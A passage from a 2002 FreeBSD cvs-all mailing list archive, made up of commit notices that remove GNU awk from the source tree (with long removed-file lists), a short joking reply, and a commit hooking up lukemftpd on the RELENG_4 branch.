owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/20 13:54:15 PDT Removed files: gnu/usr.bin/awk Makefile config.h gnu/usr.bin/awk/doc Makefile Log: Remove GAWK. I removed it from the build 2 weeks ago and the world did not end. So finish the deed. Revision Changes Path 1.22 +0 -28 src/gnu/usr.bin/awk/Makefile (dead) 1.9 +0 -324 src/gnu/usr.bin/awk/config.h (dead) 1.9 +0 -11 src/gnu/usr.bin/awk/doc/Makefile (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 13:56: 3 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 65B5737B43B; Thu, 20 Jun 2002 13:54:55 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KKstJ70241; Thu, 20 Jun 2002 13:54:55 -0700 (PDT) (envelope-from obrien) Message-Id: <200206202054.g5KKstJ70241@freefall.freebsd.org> From: "David E. O'Brien" Date: Thu, 20 Jun 2002 13:54:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/contrib/awk ACKNOWLEDGMENT AUTHORS COPYING ChangeLog FREEBSD-upgrade FUTURES INSTALL LIMITATIONS Makefile.am Makefile.in NEWS PORTS POSIX.STD PROBLEMS README acconfig.h aclocal.m4 alloca.c array.c awk.h awk.y awkgram.y awktab.c ... X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/20 13:54:55 PDT Removed files: contrib/awk ACKNOWLEDGMENT AUTHORS COPYING ChangeLog FREEBSD-upgrade FUTURES INSTALL LIMITATIONS Makefile.am Makefile.in NEWS PORTS POSIX.STD PROBLEMS README acconfig.h aclocal.m4 alloca.c array.c awk.h awk.y awkgram.y awktab.c builtin.c configh.in configure configure.in custom.h dfa.c dfa.h eval.c eval_p.c ext.c field.c fixvers gawkmisc.c getopt.c getopt.h getopt1.c install-sh io.c main.c mkinstalldirs msg.c node.c patchlev.h patchlevel.h profile.c profile_p.c protos.h re.c regex.c replace.c stamp-h.in version.c version.in contrib/awk/README_d README.FIRST README.tests contrib/awk/awklib ChangeLog Makefile.am Makefile.in extract.awk stamp-eg contrib/awk/awklib/eg/data BBS-list inventory-shipped contrib/awk/awklib/eg/lib assert.awk bits2str.awk cliff_rand.awk ctime.awk ftrans.awk getopt.awk gettime.awk grcat.c groupawk.in join.awk libintl.awk mktime.awk nextfile.awk noassign.awk ord.awk passwdawk.in pwcat.c readable.awk rewind.awk round.awk contrib/awk/awklib/eg/misc arraymax.awk arraymax.data findpat.awk findpat.data findpat.sh contrib/awk/awklib/eg/network PostAgent.sh coreserv.awk eliza.awk fingerclient.awk geturl.awk hello-serv.awk maze.awk mobag.awk panic.awk protbase.awk protbase.request protbase.result remconf.awk statist.awk stoxdata.txt stoxpred.awk testserv.awk urlchk.awk webgrab.awk contrib/awk/awklib/eg/prog alarm.awk awksed.awk cut.awk dupword.awk egrep.awk extract.awk guide.awk histsort.awk id.awk igawk.sh labels.awk split.awk tee.awk testbits.awk translate.awk uniq.awk wc.awk wordfreq.awk contrib/awk/doc ChangeLog Makefile.am Makefile.in README.card ad.block awk.1 awkcard.in awkforai.txt cardfonts colors gawk.1 gawk.texi gawkinet.texi igawk.1 macros no.colors setter.outline texinfo.tex contrib/awk/extension dl.c doit filefuncs.c foo.awk fork.c steps testff.awk testfork.awk contrib/awk/po POTFILES.in cat-id-tbl.c gawk.pot he.gmo stamp-cat-id contrib/awk/posix ChangeLog gawkmisc.c contrib/awk/test Makefile.am addcomma.awk addcomma.in addcomma.ok arynasty.awk arynasty.ok arynocls.awk arynocls.in arynocls.ok arysubnm.awk arysubnm.ok clos1way.awk clos1way.ok datanonl.awk datanonl.in datanonl.ok fnamedat.awk fnamedat.in fnamedat.ok fnaryscl.awk fnaryscl.ok fnasgnm.awk fnasgnm.in fnasgnm.ok fnparydl.awk fnparydl.ok fsfwfs.awk fsfwfs.in fsfwfs.ok funsemnl.awk funsemnl.ok funsmnam.awk funsmnam.ok getlnbuf.awk getlnbuf.in getlnbuf.ok getnr2tb.awk getnr2tb.in getnr2tb.ok getnr2tm.awk getnr2tm.in getnr2tm.ok gnuops2.awk gnuops2.ok gtlnbufv.awk hsprint.awk hsprint.ok igncdym.awk igncdym.in igncdym.ok leaddig.awk leaddig.ok leadnl.awk leadnl.in leadnl.ok lint.awk lint.ok nasty.awk nasty.ok nasty2.awk nasty2.ok nlinstr.awk nlinstr.in nlinstr.ok nlstrina.awk nlstrina.ok numindex.awk numindex.in numindex.ok octsub.awk octsub.ok ofmt.awk ofmt.in ofmt.ok ofmtbig.awk ofmtbig.in ofmtbig.ok ofmts.awk ofmts.in ofmts.ok opasnidx.awk opasnidx.ok opasnslf.awk opasnslf.ok paramtyp.awk paramtyp.ok parseme.awk parseme.ok poundbang.awk printf1.awk printf1.ok printfloat.awk procinfs.awk procinfs.ok psx96sub.awk psx96sub.ok rebt8b1.awk rebt8b1.ok rebt8b2.awk rebt8b2.ok redfilnm.awk redfilnm.in redfilnm.ok regeq.awk regeq.in regeq.ok regtest.sh regx8bit.awk regx8bit.ok rsnul1nl.awk rsnul1nl.in rsnul1nl.ok shadow.awk shadow.ok sort1.awk sort1.ok splitdef.awk splitdef.ok strftime.awk strtod.awk strtod.in strtod.ok subslash.awk subslash.ok zeroflag.awk zeroflag.ok contrib/awk/test/reg/Obsolete exp.awk exp.good exp.in log.awk log.good log.in Log: Remove GAWK. I removed it from the build 2 weeks ago and the world did not end. So finish the deed. Revision Changes Path 1.2 +0 -34 src/contrib/awk/ACKNOWLEDGMENT (dead) 1.2 +0 -9 src/contrib/awk/AUTHORS (dead) 1.2 +0 -340 src/contrib/awk/COPYING (dead) 1.2 +0 -826 src/contrib/awk/ChangeLog (dead) 1.8 +0 -24 src/contrib/awk/FREEBSD-upgrade (dead) 1.2 +0 -108 src/contrib/awk/FUTURES (dead) 1.2 +0 -181 src/contrib/awk/INSTALL (dead) 1.2 +0 -16 src/contrib/awk/LIMITATIONS (dead) 1.2 +0 -161 src/contrib/awk/Makefile.am (dead) 1.2 +0 -286 src/contrib/awk/Makefile.in (dead) 1.2 +0 -1802 src/contrib/awk/NEWS (dead) 1.2 +0 -36 src/contrib/awk/PORTS (dead) 1.2 +0 -109 src/contrib/awk/POSIX.STD (dead) 1.2 +0 -10 src/contrib/awk/PROBLEMS (dead) 1.2 +0 -94 src/contrib/awk/README (dead) 1.2 +0 -21 src/contrib/awk/README_d/README.FIRST (dead) 1.2 +0 -46 src/contrib/awk/README_d/README.tests (dead) 1.2 +0 -36 src/contrib/awk/acconfig.h (dead) 1.2 +0 -129 src/contrib/awk/aclocal.m4 (dead) 1.2 +0 -496 src/contrib/awk/alloca.c (dead) 1.2 +0 -526 src/contrib/awk/array.c (dead) 1.8 +0 -1017 src/contrib/awk/awk.h (dead) 1.2 +0 -2434 src/contrib/awk/awk.y (dead) 1.2 +0 -2875 src/contrib/awk/awkgram.y (dead) 1.2 +0 -54 src/contrib/awk/awklib/ChangeLog (dead) 1.2 +0 -75 src/contrib/awk/awklib/Makefile.am (dead) 1.2 +0 -99 src/contrib/awk/awklib/Makefile.in (dead) 1.2 +0 -11 src/contrib/awk/awklib/eg/data/BBS-list (dead) 1.2 +0 -17 src/contrib/awk/awklib/eg/data/inventory-shipped (dead) 1.2 +0 -18 src/contrib/awk/awklib/eg/lib/assert.awk (dead) 1.2 +0 -16 src/contrib/awk/awklib/eg/lib/bits2str.awk (dead) 1.2 +0 -14 src/contrib/awk/awklib/eg/lib/cliff_rand.awk (dead) 1.2 +0 -11 src/contrib/awk/awklib/eg/lib/ctime.awk (dead) 1.2 +0 -15 src/contrib/awk/awklib/eg/lib/ftrans.awk (dead) 1.2 +0 -82 src/contrib/awk/awklib/eg/lib/getopt.awk (dead) 1.2 +0 -61 src/contrib/awk/awklib/eg/lib/gettime.awk (dead) 1.2 +0 -34 src/contrib/awk/awklib/eg/lib/grcat.c (dead) 1.2 +0 -80 src/contrib/awk/awklib/eg/lib/groupawk.in (dead) 1.2 +0 -15 src/contrib/awk/awklib/eg/lib/join.awk (dead) 1.2 +0 -9 src/contrib/awk/awklib/eg/lib/libintl.awk (dead) 1.2 +0 -105 src/contrib/awk/awklib/eg/lib/mktime.awk (dead) 1.2 +0 -15 src/contrib/awk/awklib/eg/lib/nextfile.awk (dead) 1.2 +0 -17 src/contrib/awk/awklib/eg/lib/noassign.awk (dead) 1.2 +0 -54 src/contrib/awk/awklib/eg/lib/ord.awk (dead) 1.2 +0 -56 src/contrib/awk/awklib/eg/lib/passwdawk.in (dead) 1.2 +0 -29 src/contrib/awk/awklib/eg/lib/pwcat.c (dead) 1.2 +0 -16 src/contrib/awk/awklib/eg/lib/readable.awk (dead) 1.2 +0 -20 src/contrib/awk/awklib/eg/lib/rewind.awk (dead) 1.2 +0 -32 src/contrib/awk/awklib/eg/lib/round.awk (dead) 1.2 +0 -10 src/contrib/awk/awklib/eg/misc/arraymax.awk (dead) 1.2 +0 -5 src/contrib/awk/awklib/eg/misc/arraymax.data (dead) 1.2 +0 -10 src/contrib/awk/awklib/eg/misc/findpat.awk (dead) 1.2 +0 -7 src/contrib/awk/awklib/eg/misc/findpat.data (dead) 1.2 +0 -10 src/contrib/awk/awklib/eg/misc/findpat.sh (dead) 1.2 +0 -9 src/contrib/awk/awklib/eg/network/PostAgent.sh (dead) 1.2 +0 -113 src/contrib/awk/awklib/eg/network/coreserv.awk (dead) 1.2 +0 -270 src/contrib/awk/awklib/eg/network/eliza.awk (dead) 1.2 +0 -7 src/contrib/awk/awklib/eg/network/fingerclient.awk (dead) 1.2 +0 -24 src/contrib/awk/awklib/eg/network/geturl.awk (dead) 1.2 +0 -14 src/contrib/awk/awklib/eg/network/hello-serv.awk (dead) 1.2 +0 -73 src/contrib/awk/awklib/eg/network/maze.awk (dead) 1.2 +0 -72 src/contrib/awk/awklib/eg/network/mobag.awk (dead) 1.2 +0 -18 src/contrib/awk/awklib/eg/network/panic.awk (dead) 1.2 +0 -11 src/contrib/awk/awklib/eg/network/protbase.awk (dead) 1.2 +0 -7 src/contrib/awk/awklib/eg/network/protbase.request (dead) 1.2 +0 -9 src/contrib/awk/awklib/eg/network/protbase.result (dead) 1.2 +0 -54 src/contrib/awk/awklib/eg/network/remconf.awk (dead) 1.2 +0 -85 src/contrib/awk/awklib/eg/network/statist.awk (dead) 1.2 +0 -4 src/contrib/awk/awklib/eg/network/stoxdata.txt (dead) 1.2 +0 -116 src/contrib/awk/awklib/eg/network/stoxpred.awk (dead) 1.2 +0 -12 src/contrib/awk/awklib/eg/network/testserv.awk (dead) 1.2 +0 -28 src/contrib/awk/awklib/eg/network/urlchk.awk (dead) 1.2 +0 -6 src/contrib/awk/awklib/eg/network/webgrab.awk (dead) 1.2 +0 -81 src/contrib/awk/awklib/eg/prog/alarm.awk (dead) 1.2 +0 -31 src/contrib/awk/awklib/eg/prog/awksed.awk (dead) 1.2 +0 -136 src/contrib/awk/awklib/eg/prog/cut.awk (dead) 1.2 +0 -16 src/contrib/awk/awklib/eg/prog/dupword.awk (dead) 1.2 +0 -96 src/contrib/awk/awklib/eg/prog/egrep.awk (dead) 1.2 +0 -71 src/contrib/awk/awklib/eg/prog/extract.awk (dead) 1.2 +0 -7 src/contrib/awk/awklib/eg/prog/guide.awk (dead) 1.2 +0 -14 src/contrib/awk/awklib/eg/prog/histsort.awk (dead) 1.2 +0 -69 src/contrib/awk/awklib/eg/prog/id.awk (dead) 1.2 +0 -129 src/contrib/awk/awklib/eg/prog/igawk.sh (dead) 1.2 +0 -53 src/contrib/awk/awklib/eg/prog/labels.awk (dead) 1.2 +0 -53 src/contrib/awk/awklib/eg/prog/split.awk (dead) 1.2 +0 -38 src/contrib/awk/awklib/eg/prog/tee.awk (dead) 1.2 +0 -27 src/contrib/awk/awklib/eg/prog/testbits.awk (dead) 1.2 +0 -46 src/contrib/awk/awklib/eg/prog/translate.awk (dead) 1.2 +0 -116 src/contrib/awk/awklib/eg/prog/uniq.awk (dead) 1.2 +0 -67 src/contrib/awk/awklib/eg/prog/wc.awk (dead) 1.2 +0 -13 src/contrib/awk/awklib/eg/prog/wordfreq.awk (dead) 1.2 +0 -87 src/contrib/awk/awklib/extract.awk (dead) 1.2 +0 -2 src/contrib/awk/awklib/stamp-eg (dead) 1.2 +0 -3983 src/contrib/awk/awktab.c (dead) 1.12 +0 -2499 src/contrib/awk/builtin.c (dead) 1.2 +0 -225 src/contrib/awk/configh.in (dead) 1.2 +0 -3685 src/contrib/awk/configure (dead) 1.2 +0 -165 src/contrib/awk/configure.in (dead) 1.2 +0 -59 src/contrib/awk/custom.h (dead) 1.9 +0 -2633 src/contrib/awk/dfa.c (dead) 1.2 +0 -364 src/contrib/awk/dfa.h (dead) 1.2 +0 -91 src/contrib/awk/doc/ChangeLog (dead) 1.2 +0 -80 src/contrib/awk/doc/Makefile.am (dead) 1.2 +0 -129 src/contrib/awk/doc/Makefile.in (dead) 1.2 +0 -19 src/contrib/awk/doc/README.card (dead) 1.2 +0 -49 src/contrib/awk/doc/ad.block (dead) 1.6 +0 -2628 src/contrib/awk/doc/awk.1 (dead) 1.2 +0 -1550 src/contrib/awk/doc/awkcard.in (dead) 1.2 +0 -150 src/contrib/awk/doc/awkforai.txt (dead) 1.2 +0 -37 src/contrib/awk/doc/cardfonts (dead) 1.2 +0 -39 src/contrib/awk/doc/colors (dead) 1.2 +0 -2657 src/contrib/awk/doc/gawk.1 (dead) 1.2 +0 -20820 src/contrib/awk/doc/gawk.texi (dead) 1.2 +0 -5075 src/contrib/awk/doc/gawkinet.texi (dead) 1.2 +0 -73 src/contrib/awk/doc/igawk.1 (dead) 1.2 +0 -211 src/contrib/awk/doc/macros (dead) 1.2 +0 -31 src/contrib/awk/doc/no.colors (dead) 1.2 +0 -77 src/contrib/awk/doc/setter.outline (dead) 1.2 +0 -5992 src/contrib/awk/doc/texinfo.tex (dead) 1.7 +0 -2154 src/contrib/awk/eval.c (dead) 1.2 +0 -27 src/contrib/awk/eval_p.c (dead) 1.2 +0 -186 src/contrib/awk/ext.c (dead) 1.2 +0 -96 src/contrib/awk/extension/dl.c (dead) 1.2 +0 -1 src/contrib/awk/extension/doit (dead) 1.2 +0 -339 src/contrib/awk/extension/filefuncs.c (dead) 1.2 +0 -9 src/contrib/awk/extension/foo.awk (dead) 1.2 +0 -106 src/contrib/awk/extension/fork.c (dead) 1.2 +0 -9 src/contrib/awk/extension/steps (dead) 1.2 +0 -30 src/contrib/awk/extension/testff.awk (dead) 1.2 +0 -20 src/contrib/awk/extension/testfork.awk (dead) 1.9 +0 -998 src/contrib/awk/field.c (dead) 1.2 +0 -58 src/contrib/awk/fixvers (dead) 1.2 +0 -63 src/contrib/awk/gawkmisc.c (dead) 1.2 +0 -1000 src/contrib/awk/getopt.c (dead) 1.2 +0 -133 src/contrib/awk/getopt.h (dead) 1.2 +0 -189 src/contrib/awk/getopt1.c (dead) 1.2 +0 -238 src/contrib/awk/install-sh (dead) 1.7 +0 -2400 src/contrib/awk/io.c (dead) 1.7 +0 -1006 src/contrib/awk/main.c (dead) 1.2 +0 -32 src/contrib/awk/mkinstalldirs (dead) 1.2 +0 -189 src/contrib/awk/msg.c (dead) 1.7 +0 -571 src/contrib/awk/node.c (dead) 1.2 +0 -1 src/contrib/awk/patchlev.h (dead) 1.2 +0 -1 src/contrib/awk/patchlevel.h (dead) 1.2 +0 -23 src/contrib/awk/po/POTFILES.in (dead) 1.2 +0 -411 src/contrib/awk/po/cat-id-tbl.c (dead) 1.2 +0 -1696 src/contrib/awk/po/gawk.pot (dead) 1.2 +0 -125 src/contrib/awk/po/he.gmo (dead) 1.2 +0 -1 src/contrib/awk/po/stamp-cat-id (dead) 1.2 +0 -19 src/contrib/awk/posix/ChangeLog (dead) 1.2 +0 -108 src/contrib/awk/posix/gawkmisc.c (dead) 1.2 +0 -1381 src/contrib/awk/profile.c (dead) 1.2 +0 -27 src/contrib/awk/profile_p.c (dead) 1.2 +0 -128 src/contrib/awk/protos.h (dead) 1.2 +0 -310 src/contrib/awk/re.c (dead) 1.2 +0 -5744 src/contrib/awk/regex.c (dead) 1.2 +0 -70 src/contrib/awk/replace.c (dead) 1.2 +0 -1 src/contrib/awk/stamp-h.in (dead) 1.2 +0 -1036 src/contrib/awk/test/Makefile.am (dead) 1.2 +0 -15 src/contrib/awk/test/addcomma.awk (dead) 1.2 +0 -7 src/contrib/awk/test/addcomma.in (dead) 1.2 +0 -7 src/contrib/awk/test/addcomma.ok (dead) 1.2 +0 -16 src/contrib/awk/test/arynasty.awk (dead) 1.2 +0 -1 src/contrib/awk/test/arynasty.ok (dead) 1.2 +0 -95 src/contrib/awk/test/arynocls.awk (dead) 1.2 +0 -30 src/contrib/awk/test/arynocls.in (dead) 1.2 +0 -0 src/contrib/awk/test/arynocls.ok (dead) 1.2 +0 -1 src/contrib/awk/test/arysubnm.awk (dead) 1.2 +0 -1 src/contrib/awk/test/arysubnm.ok (dead) 1.2 +0 -21 src/contrib/awk/test/clos1way.awk (dead) 1.2 +0 -26 src/contrib/awk/test/clos1way.ok (dead) 1.2 +0 -3 src/contrib/awk/test/datanonl.awk (dead) 1.2 +0 -1 src/contrib/awk/test/datanonl.in (dead) 1.2 +0 -1 src/contrib/awk/test/datanonl.ok (dead) 1.2 +0 -1 src/contrib/awk/test/fnamedat.awk (dead) 1.2 +0 -1 src/contrib/awk/test/fnamedat.in (dead) 1.2 +0 -1 src/contrib/awk/test/fnamedat.ok (dead) 1.2 +0 -10 src/contrib/awk/test/fnaryscl.awk (dead) 1.2 +0 -1 src/contrib/awk/test/fnaryscl.ok (dead) 1.2 +0 -14 src/contrib/awk/test/fnasgnm.awk (dead) 1.2 +0 -1 src/contrib/awk/test/fnasgnm.in (dead) 1.2 +0 -1 src/contrib/awk/test/fnasgnm.ok (dead) 1.2 +0 -31 src/contrib/awk/test/fnparydl.awk (dead) 1.2 +0 -10 src/contrib/awk/test/fnparydl.ok (dead) 1.2 +0 -1 src/contrib/awk/test/fsfwfs.awk (dead) 1.2 +0 -16 src/contrib/awk/test/fsfwfs.in (dead) 1.2 +0 -16 src/contrib/awk/test/fsfwfs.ok (dead) 1.2 +0 -3 src/contrib/awk/test/funsemnl.awk (dead) 1.2 +0 -1 src/contrib/awk/test/funsemnl.ok (dead) 1.2 +0 -6 src/contrib/awk/test/funsmnam.awk (dead) 1.2 +0 -1 src/contrib/awk/test/funsmnam.ok (dead) 1.2 +0 -18 src/contrib/awk/test/getlnbuf.awk (dead) 1.2 +0 -1708 src/contrib/awk/test/getlnbuf.in (dead) 1.2 +0 -1708 src/contrib/awk/test/getlnbuf.ok (dead) 1.2 +0 -111 src/contrib/awk/test/getnr2tb.awk (dead) 1.2 +0 -6 src/contrib/awk/test/getnr2tb.in (dead) 1.2 +0 -6 src/contrib/awk/test/getnr2tb.ok (dead) 1.2 +0 -75 src/contrib/awk/test/getnr2tm.awk (dead) 1.2 +0 -1 src/contrib/awk/test/getnr2tm.in (dead) 1.2 +0 -1 src/contrib/awk/test/getnr2tm.ok (dead) 1.2 +0 -72 src/contrib/awk/test/gnuops2.awk (dead) 1.2 +0 -7 src/contrib/awk/test/gnuops2.ok (dead) 1.2 +0 -2 src/contrib/awk/test/gtlnbufv.awk (dead) 1.2 +0 -74 src/contrib/awk/test/hsprint.awk (dead) 1.2 +0 -66 src/contrib/awk/test/hsprint.ok (dead) 1.2 +0 -56 src/contrib/awk/test/igncdym.awk (dead) 1.2 +0 -2 src/contrib/awk/test/igncdym.in (dead) 1.2 +0 -4 src/contrib/awk/test/igncdym.ok (dead) 1.2 +0 -7 src/contrib/awk/test/leaddig.awk (dead) 1.2 +0 -1 src/contrib/awk/test/leaddig.ok (dead) 1.2 +0 -10 src/contrib/awk/test/leadnl.awk (dead) 1.2 +0 -9 src/contrib/awk/test/leadnl.in (dead) 1.2 +0 -8 src/contrib/awk/test/leadnl.ok (dead) 1.2 +0 -14 src/contrib/awk/test/lint.awk (dead) 1.2 +0 -5 src/contrib/awk/test/lint.ok (dead) 1.2 +0 -92 src/contrib/awk/test/nasty.awk (dead) 1.2 +0 -2 src/contrib/awk/test/nasty.ok (dead) 1.2 +0 -20 src/contrib/awk/test/nasty2.awk (dead) 1.2 +0 -2 src/contrib/awk/test/nasty2.ok (dead) 1.2 +0 -8 src/contrib/awk/test/nlinstr.awk (dead) 1.2 +0 -2 src/contrib/awk/test/nlinstr.in (dead) 1.2 +0 -1 src/contrib/awk/test/nlinstr.ok (dead) 1.2 +0 -77 src/contrib/awk/test/nlstrina.awk (dead) 1.2 +0 -3 src/contrib/awk/test/nlstrina.ok (dead) 1.2 +0 -55 src/contrib/awk/test/numindex.awk (dead) 1.2 +0 -4 src/contrib/awk/test/numindex.in (dead) 1.2 +0 -1 src/contrib/awk/test/numindex.ok (dead) 1.2 +0 -1 src/contrib/awk/test/octsub.awk (dead) 1.2 +0 -1 src/contrib/awk/test/octsub.ok (dead) 1.2 +0 -53 src/contrib/awk/test/ofmt.awk (dead) 1.2 +0 -136 src/contrib/awk/test/ofmt.in (dead) 1.2 +0 -6 src/contrib/awk/test/ofmt.ok (dead) 1.2 +0 -125 src/contrib/awk/test/ofmtbig.awk (dead) 1.2 +0 -3 src/contrib/awk/test/ofmtbig.in (dead) 1.2 +0 -2 src/contrib/awk/test/ofmtbig.ok (dead) 1.2 +0 -2 src/contrib/awk/test/ofmts.awk (dead) 1.2 +0 -1 src/contrib/awk/test/ofmts.in (dead) 1.2 +0 -1 src/contrib/awk/test/ofmts.ok (dead) 1.2 +0 -1 src/contrib/awk/test/opasnidx.awk (dead) 1.2 +0 -1 src/contrib/awk/test/opasnidx.ok (dead) 1.2 +0 -6 src/contrib/awk/test/opasnslf.awk (dead) 1.2 +0 -3 src/contrib/awk/test/opasnslf.ok (dead) 1.2 +0 -20 src/contrib/awk/test/paramtyp.awk (dead) 1.2 +0 -6 src/contrib/awk/test/paramtyp.ok (dead) 1.2 +0 -1 src/contrib/awk/test/parseme.awk (dead) 1.2 +0 -3 src/contrib/awk/test/parseme.ok (dead) 1.2 +0 -3 src/contrib/awk/test/poundbang.awk (dead) 1.2 +0 -19 src/contrib/awk/test/printf1.awk (dead) 1.2 +0 -7 src/contrib/awk/test/printf1.ok (dead) 1.2 +0 -62 src/contrib/awk/test/printfloat.awk (dead) 1.2 +0 -7 src/contrib/awk/test/procinfs.awk (dead) 1.2 +0 -3 src/contrib/awk/test/procinfs.ok (dead) 1.2 +0 -7 src/contrib/awk/test/psx96sub.awk (dead) 1.2 +0 -2 src/contrib/awk/test/psx96sub.ok (dead) 1.2 +0 -138 src/contrib/awk/test/rebt8b1.awk (dead) 1.2 +0 -16 src/contrib/awk/test/rebt8b1.ok (dead) 1.2 +0 -88 src/contrib/awk/test/rebt8b2.awk (dead) 1.2 +0 -511 src/contrib/awk/test/rebt8b2.ok (dead) 1.2 +0 -98 src/contrib/awk/test/redfilnm.awk (dead) 1.2 +0 -1 src/contrib/awk/test/redfilnm.in (dead) 1.2 +0 -9 src/contrib/awk/test/redfilnm.ok (dead) 1.2 +0 -1 src/contrib/awk/test/reg/Obsolete/exp.awk (dead) 1.2 +0 -2 src/contrib/awk/test/reg/Obsolete/exp.good (dead) 1.2 +0 -0 src/contrib/awk/test/reg/Obsolete/exp.in (dead) 1.2 +0 -1 src/contrib/awk/test/reg/Obsolete/log.awk (dead) 1.2 +0 -4 src/contrib/awk/test/reg/Obsolete/log.good (dead) 1.2 +0 -0 src/contrib/awk/test/reg/Obsolete/log.in (dead) 1.2 +0 -29 src/contrib/awk/test/regeq.awk (dead) 1.2 +0 -2 src/contrib/awk/test/regeq.in (dead) 1.2 +0 -2 src/contrib/awk/test/regeq.ok (dead) 1.2 +0 -18 src/contrib/awk/test/regtest.sh (dead) 1.2 +0 -26 src/contrib/awk/test/regx8bit.awk (dead) 1.2 +0 -7 src/contrib/awk/test/regx8bit.ok (dead) 1.2 +0 -2 src/contrib/awk/test/rsnul1nl.awk (dead) 1.2 +0 -3 src/contrib/awk/test/rsnul1nl.in (dead) 1.2 +0 -2 src/contrib/awk/test/rsnul1nl.ok (dead) 1.2 +0 -21 src/contrib/awk/test/shadow.awk (dead) 1.2 +0 -7 src/contrib/awk/test/shadow.ok (dead) 1.2 +0 -31 src/contrib/awk/test/sort1.awk (dead) 1.2 +0 -11 src/contrib/awk/test/sort1.ok (dead) 1.2 +0 -7 src/contrib/awk/test/splitdef.awk (dead) 1.2 +0 -1 src/contrib/awk/test/splitdef.ok (dead) 1.2 +0 -15 src/contrib/awk/test/strftime.awk (dead) 1.2 +0 -1 src/contrib/awk/test/strtod.awk (dead) 1.2 +0 -1 src/contrib/awk/test/strtod.in (dead) 1.2 +0 -1 src/contrib/awk/test/strtod.ok (dead) 1.2 +0 -6 src/contrib/awk/test/subslash.awk (dead) 1.2 +0 -1 src/contrib/awk/test/subslash.ok (dead) 1.2 +0 -1 src/contrib/awk/test/zeroflag.awk (dead) 1.2 +0 -1 src/contrib/awk/test/zeroflag.ok (dead) 1.2 +0 -50 src/contrib/awk/version.c (dead) 1.2 +0 -53 src/contrib/awk/version.in (dead) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14: 6:54 2002 Delivered-To: cvs-all@freebsd.org Received: by hub.freebsd.org (Postfix, from userid 931) id A81A737B403; Thu, 20 Jun 2002 14:06:44 -0700 (PDT) Date: Thu, 20 Jun 2002 14:06:44 -0700 From: Juli Mallett To: "David E. O'Brien" Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/contrib/awk ACKNOWLEDGMENT AUTHORS COPYING ChangeLog FREEBSD-upgrade FUTURES INSTALL LIMITATIONS Makefile.am Makefile.in NEWS PORTS POSIX.STD PROBLEMS README acconfig.h aclocal.m4 alloca.c array.c awk.h awk.y awkgram.y awktab.c ... Message-ID: <20020620140644.A52397@FreeBSD.ORG> References: <200206202054.g5KKstJ70241@freefall.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <200206202054.g5KKstJ70241@freefall.freebsd.org>; from obrien@FreeBSD.org on Thu, Jun 20, 2002 at 01:54:55PM -0700 Organisation: The FreeBSD Project X-Alternate-Addresses: , , , X-Affiliated-Projects: FreeBSD, xMach, ircd-hybrid-7 X-Towel: Yes Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG What, no tombstone with a witty eiptaph? -- Juli Mallett | FreeBSD: The Power To Serve Will break world for fulltime employment. | finger jmallett@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:13:44 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 894BA37B408; Thu, 20 Jun 2002 14:13:33 -0700 (PDT) Received: (from obrien@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLDX876121; Thu, 20 Jun 2002 14:13:33 -0700 (PDT) (envelope-from obrien) Message-Id: <200206202113.g5KLDX876121@freefall.freebsd.org> From: "David E. O'Brien" Date: Thu, 20 Jun 2002 14:13:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/libexec Makefile src/etc inetd.conf src/libexec/lukemftpd Makefile config.h X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG obrien 2002/06/20 14:13:33 PDT Modified files: (Branch: RELENG_4) libexec Makefile etc inetd.conf Added files: (Branch: RELENG_4) libexec/lukemftpd Makefile config.h Log: MFC: hookup lukemftpd Revision Changes Path 1.44.2.15 +2 -1 src/etc/inetd.conf 1.42.2.3 +1 -0 src/libexec/Makefile 1.5.2.1 +49 -0 src/libexec/lukemftpd/Makefile (new) 1.1.2.1 +281 -0 src/libexec/lukemftpd/config.h (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 14:17:39 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 4EF2F37B404; Thu, 20 Jun 2002 14:17:34 -0700 (PDT) Received: (from luigi@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KLHYm76330; Thu, 20 Jun 2002 14:17:34 -0700 (PDT) (envelope-from luigi) Message-Id: <200206202117.g5KLHYm76330@freefall.freebsd.org> From: Luigi Rizzo Date: Thu, 20 Jun 2002 14:17:34 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/release/picobsd/tinyware/passwd Makefile extern.h local_passwd.c pw_copy.c pw_util.c 